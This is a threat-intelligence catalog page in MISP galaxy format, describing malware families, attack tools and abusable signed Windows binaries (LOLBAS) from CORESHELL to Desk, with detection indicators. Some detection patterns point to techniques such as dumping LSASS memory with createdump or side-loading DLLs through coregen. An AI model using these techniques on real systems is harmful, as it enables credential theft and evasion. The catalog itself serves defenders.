| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0212 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
coregen
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
Author: Martin Sohn Christensen
Paths: * C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe * C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Resources: * https://www.youtube.com/watch?v=75XImxOOInU * https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Detection: * Sigma: image_load_side_load_coregen.yml * IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" * IOC: coregen.exe loading .dll file not named coreclr.dll * IOC: coregen.exe command line containing -L or -l * IOC: coregen.exe command line containing unexpected/invald assembly name * IOC: coregen.exe application crash by invalid assembly name[coregen.exe - LOLBAS Project]
Internal MISP references
UUID b7dacd5c-eaba-48db-bdd7-e779a82b2ba7 which can be used as unique global reference for coregen in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5209 |
| source | Tidal Cyber |
| tags | ['a19a158e-aec4-410a-8c3e-e9080b111183', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CORESHELL
CORESHELL is a downloader used by APT28. The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.[FireEye APT28] [FireEye APT28 January 2017]
Internal MISP references
UUID 3b193f62-2b49-4eff-bdf4-501fb8a28274 which can be used as unique global reference for CORESHELL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0137 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CosmicDuke
CosmicDuke is malware that was used by APT29 from 2010 to 2015. [F-Secure The Dukes]
Internal MISP references
UUID 43b317c6-5b4f-47b8-b7b4-15cd6f455091 which can be used as unique global reference for CosmicDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0050 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CostaBricks
CostaBricks is a loader that was used to deploy 32-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]
Internal MISP references
UUID ea9e2d19-89fe-4039-a1e0-467b14554c6f which can be used as unique global reference for CostaBricks in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0614 |
| source | MITRE |
| type | ['malware'] |
CozyCar
CozyCar is malware that was used by APT29 from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. [F-Secure The Dukes]
Internal MISP references
UUID c2353daa-fd4c-44e1-8013-55400439965a which can be used as unique global reference for CozyCar in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0046 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CrackMapExec
CrackMapExec, or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks.[CME Github September 2018]
Internal MISP references
UUID 47e710b4-1397-47cf-a979-20891192f313 which can be used as unique global reference for CrackMapExec in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0488 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Createdump
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: mr.d0x, Daniel Santos
Paths: * C:\Program Files\dotnet\shared\Microsoft.NETCore.App*\createdump.exe * C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App*\createdump.exe * C:\Program Files\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
Resources: * https://twitter.com/bopin2020/status/1366400799199272960 * https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps
Detection: * Sigma: proc_creation_win_proc_dump_createdump.yml * Sigma: proc_creation_win_renamed_createdump.yml * IOC: createdump.exe process with a command line containing the lsass.exe process id[Createdump.exe - LOLBAS Project]
Internal MISP references
UUID a574b315-523c-45c3-8743-feb3d541e81a which can be used as unique global reference for Createdump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5210 |
| source | Tidal Cyber |
| tags | ['7beee233-2b65-4593-88e6-a5c0c02c6a08', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CredoMap
CredoMap is a credential-stealing malware developed by the Russian espionage actor APT28. The malware harvests cookies and credentials from select web browsers and exfiltrates the information via the IMAP email protocol. CredoMap was observed being used in attack campaigns in Ukraine in 2022.[CERTFR-2023-CTI-009][SecurityScorecard CredoMap September 2022]
Internal MISP references
UUID 516ffd19-72b9-43a1-b866-bb075fdcb137 which can be used as unique global reference for CredoMap in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5074 |
| source | Tidal Cyber |
| tags | ['904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CreepyDrive
CreepyDrive is a custom implant has been used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.[Microsoft POLONIUM June 2022]
POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[Microsoft POLONIUM June 2022]
Internal MISP references
UUID 7f7f05c3-fbb1-475e-b672-2113709065c8 which can be used as unique global reference for CreepyDrive in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Office 365', 'Windows'] |
| software_attack_id | S1023 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CreepySnail
CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[Microsoft POLONIUM June 2022]
Internal MISP references
UUID 11ce380c-481b-4c9b-b44e-06f1a91c01c1 which can be used as unique global reference for CreepySnail in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1024 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Crimson
Crimson is a remote access Trojan that has been used by Transparent Tribe since at least 2016.[Proofpoint Operation Transparent Tribe March 2016][Kaspersky Transparent Tribe August 2020]
Internal MISP references
UUID 3b3f296f-20a6-459a-98c5-62ebdee3701f which can be used as unique global reference for Crimson in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0115 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CrossRAT
CrossRAT is a cross platform RAT.
Internal MISP references
UUID 38811c3b-f548-43fa-ab26-c7243b84a055 which can be used as unique global reference for CrossRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0235 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Crutch
Crutch is a backdoor designed for document theft that has been used by Turla since at least 2015.[ESET Crutch December 2020]
Internal MISP references
UUID e1ad229b-d750-4148-a1f3-36e767b03cd1 which can be used as unique global reference for Crutch in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0538 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cryptoistic
Cryptoistic is a backdoor, written in Swift, that has been used by Lazarus Group.[SentinelOne Lazarus macOS July 2020]
Internal MISP references
UUID 12ce6d04-ebe5-440e-b342-0283b7c8a0c8 which can be used as unique global reference for Cryptoistic in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0498 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Csc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used by .NET to compile C# code
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Resources: * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Detection: * Sigma: proc_creation_win_csc_susp_parent.yml * Sigma: proc_creation_win_csc_susp_folder.yml * Elastic: defense_evasion_dotnet_compiler_parent_process.toml * Elastic: defense_evasion_execution_msbuild_started_unusal_process.toml * IOC: Csc.exe should normally not run as System account unless it is used for development.[Csc.exe - LOLBAS Project]
Internal MISP references
UUID 939eeb6b-3f74-43b6-8ead-644457ee7d78 which can be used as unique global reference for Csc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5096 |
| source | Tidal Cyber |
| tags | ['2ee25dd6-256c-4659-b1b6-f5afc943ccc1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to execute scripts in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\cscript.exe * C:\Windows\SysWOW64\cscript.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection: * Sigma: proc_creation_win_wscript_cscript_script_exec.yml * Sigma: file_event_win_net_cli_artefact.yml * Elastic: defense_evasion_unusual_dir_ads.toml * Elastic: command_and_control_remote_file_copy_scripts.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: wscript_or_cscript_suspicious_child_process.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Cscript.exe executing files from alternate data streams * IOC: DotNet CLR libraries loaded into cscript.exe * IOC: DotNet CLR Usage Log - cscript.exe.log[Cscript.exe - LOLBAS Project]
Internal MISP references
UUID 83036c61-d8cf-42f8-a9e5-dc3d26d75cdc which can be used as unique global reference for Cscript in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5097 |
| source | Tidal Cyber |
| tags | ['7cae5f59-dbbf-406f-928d-118430d2bdd0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
csi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command line interface included with Visual Studio.
Author: Oddvar Moe
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe * c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
Resources: * https://twitter.com/subTee/status/781208810723549188 * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Detection: * Sigma: proc_creation_win_csi_execution.yml * Sigma: proc_creation_win_csi_use_of_csharp_console.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[csi.exe - LOLBAS Project]
Internal MISP references
UUID a11e4ebf-59e4-4b79-8a20-be1618dfbaed which can be used as unique global reference for csi in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5211 |
| source | Tidal Cyber |
| tags | ['86bb7f3c-652c-4f77-af2a-34677ff42315', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CSPY Downloader
CSPY Downloader is a tool designed to evade analysis and download additional payloads used by Kimsuky.[Cybereason Kimsuky November 2020]
Internal MISP references
UUID eb481db6-d7ba-4873-a171-76a228c9eb97 which can be used as unique global reference for CSPY Downloader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0527 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cuba
Cuba is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.[McAfee Cuba April 2021]
Internal MISP references
UUID 095064c6-144e-4935-b878-f82151bc08e4 which can be used as unique global reference for Cuba in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0625 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930', '17864218-bc4f-4564-8abf-97c988eea9f7', 'b6458e46-650e-4e96-8e68-8a9d70bcf045', 'bac51672-8240-4182-9087-23626023e509', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
CustomShellHost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
Author: Wietze Beukema
Paths: * C:\Windows\System32\CustomShellHost.exe
Resources: * https://twitter.com/YoSignals/status/1381353520088113154 * https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
Detection: * IOC: CustomShellHost.exe is unlikely to run on normal workstations * Sigma: proc_creation_win_lolbin_customshellhost.yml[CustomShellHost.exe - LOLBAS Project]
Internal MISP references
UUID 3ff0d4fc-6678-42f0-869b-f48906d98f82 which can be used as unique global reference for CustomShellHost in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5098 |
| source | Tidal Cyber |
| tags | ['536c3d51-9fc4-445e-9723-e11b69f0d6d5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Cyclops Blink
Cyclops Blink is a modular malware that has been used in widespread campaigns by Sandworm Team since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.[NCSC Cyclops Blink February 2022][NCSC CISA Cyclops Blink Advisory February 2022][Trend Micro Cyclops Blink March 2022]
Internal MISP references
UUID 68792756-7dbf-41fd-8d48-ac3cc2b52712 which can be used as unique global reference for Cyclops Blink in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Network'] |
| software_attack_id | S0687 |
| source | MITRE |
| tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dacls
Dacls is a multi-platform remote access tool used by Lazarus Group since at least December 2019.[TrendMicro macOS Dacls May 2020][SentinelOne Lazarus macOS July 2020]
Internal MISP references
UUID 9d521c18-09f0-47be-bfe5-e1bf26f7b928 which can be used as unique global reference for Dacls in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S0497 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DanBot
DanBot is a first-stage remote access Trojan written in C# that has been used by HEXANE since at least 2018.[SecureWorks August 2019]
Internal MISP references
UUID 131c0eb2-9191-4ccd-a2d6-5f36046a8f2f which can be used as unique global reference for DanBot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1014 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkComet
DarkComet is a Windows remote administration tool and backdoor.[TrendMicro DarkComet Sept 2014][Malwarebytes DarkComet March 2018]
Internal MISP references
UUID 74f88899-56d0-4de8-97de-539b3590ab90 which can be used as unique global reference for DarkComet in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0334 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkGate
Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a 60-second tutorial here).
DarkGate is a commodity downloader. Researchers have often observed DarkGate samples making use of legitimate copies of AutoIt, a freeware BASIC-like scripting language, using it to run AutoIt scripts as part of its execution chain. Reports of DarkGate infections surged following the announcement of the disruption of the QakBot botnet by international authorities in late August 2023.[Bleeping Computer DarkGate October 14 2023] The delivery of DarkGate payloads via instant messaging platforms including Microsoft Teams and Skype was reported in September and October 2023.[DarkGate Loader delivered via Teams - Truesec][Trend Micro DarkGate October 12 2023]
Internal MISP references
UUID 7144b703-f471-4bde-bedc-e8b274854de5 which can be used as unique global reference for DarkGate in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5266 |
| source | Tidal Cyber |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkTortilla
DarkTortilla is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. DarkTortilla has been used to deliver popular information stealers, RATs, and payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.[Secureworks DarkTortilla Aug 2022]
Internal MISP references
UUID 35abcb6b-3259-57c1-94fc-50cfd5bde786 which can be used as unique global reference for DarkTortilla in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1066 |
| source | MITRE |
| type | ['malware'] |
DarkWatchman
DarkWatchman is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.[Prevailion DarkWatchman 2021]
Internal MISP references
UUID 740a0327-4caf-4d90-8b51-f3f9a4d59b37 which can be used as unique global reference for DarkWatchman in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0673 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Daserf
Daserf is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. [Trend Micro Daserf Nov 2017] [Secureworks BRONZE BUTLER Oct 2017]
Internal MISP references
UUID fad65026-57c4-4d4f-8803-87178dd4b887 which can be used as unique global reference for Daserf in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0187 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DataSvcUtil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: Ialle Teixeira
Paths: * C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
Resources: * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
Detection: * Sigma: proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml * IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. * IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.[DataSvcUtil.exe - LOLBAS Project]
Internal MISP references
UUID dd555a4c-3b04-48c1-988f-d530d699a5bf which can be used as unique global reference for DataSvcUtil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5099 |
| source | Tidal Cyber |
| tags | ['0576be43-65c6-4d1a-8a06-ed8232ca0120', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
DCSrv
DCSrv is destructive malware that has been used by Moses Staff since at least September 2021. Though DCSrv has ransomware-like capabilities, Moses Staff does not demand ransom or offer a decryption key.[Checkpoint MosesStaff Nov 2021]
Internal MISP references
UUID 26ae3cd1-6710-4807-b674-957bd67d3e76 which can be used as unique global reference for DCSrv in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1033 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DDKONG
DDKONG is a malware sample that was part of a campaign by Rancor. DDKONG was first seen used in February 2017. [Rancor Unit42 June 2018]
Internal MISP references
UUID 0657b804-a889-400a-97d7-a4989809a623 which can be used as unique global reference for DDKONG in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0255 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DEADEYE
DEADEYE is a malware launcher that has been used by APT41 since at least May 2021. DEADEYE has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[Mandiant APT41]
Internal MISP references
UUID e9533664-90c5-5b40-a40e-a69a2eda8bc9 which can be used as unique global reference for DEADEYE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1052 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
DealersChoice
DealersChoice is a Flash exploitation framework used by APT28. [Sofacy DealersChoice]
Internal MISP references
UUID 64dc5d44-2304-4875-b517-316ab98512c2 which can be used as unique global reference for DealersChoice in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0243 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DEATHRANSOM
DEATHRANSOM is ransomware written in C that has been used since at least 2020, and has potential overlap with FIVEHANDS and HELLOKITTY.[FireEye FiveHands April 2021]
Internal MISP references
UUID 832f5ab1-1267-40c9-84ef-f32d6373be4e which can be used as unique global reference for DEATHRANSOM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0616 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
DefaultPack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: @checkymander
Paths: * C:\Program Files (x86)\Microsoft\DefaultPack\
Resources: * https://twitter.com/checkymander/status/1311509470275604480.
Detection: * Sigma: proc_creation_win_lolbin_defaultpack.yml * IOC: DefaultPack.EXE spawned an unknown process[DefaultPack.EXE - LOLBAS Project]
Internal MISP references
UUID ff25ec03-1e8d-427e-b207-1e1ecca542ec which can be used as unique global reference for DefaultPack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5212 |
| source | Tidal Cyber |
| tags | ['4f7be515-680e-4375-81f6-c71c83dd440d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Defender Control
Defender Control is a tool purpose-built to disable Microsoft Defender.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID e8830cf3-53f3-4d15-858c-584589405fad which can be used as unique global reference for Defender Control in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5029 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Denis
Denis is a Windows backdoor and Trojan used by APT32. Denis shares several similarities to the SOUNDBITE backdoor and has been used in conjunction with the Goopy backdoor.[Cybereason Oceanlotus May 2017]
Internal MISP references
UUID df4002d2-f557-4f95-af7a-9a4582fb7068 which can be used as unique global reference for Denis in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0354 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Derusbi
Derusbi is malware used by multiple Chinese APT groups.[Novetta-Axiom][ThreatConnect Anthem] Both Windows and Linux variants have been observed.[Fidelis Turbo]
Internal MISP references
UUID 9222aa77-922e-43c7-89ad-71067c428fb2 which can be used as unique global reference for Derusbi in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0021 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Desk
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Desktop Settings Control Panel
Author: Hai Vaknin
Paths: * C:\Windows\System32\desk.cpl * C:\Windows\SysWOW64\desk.cpl
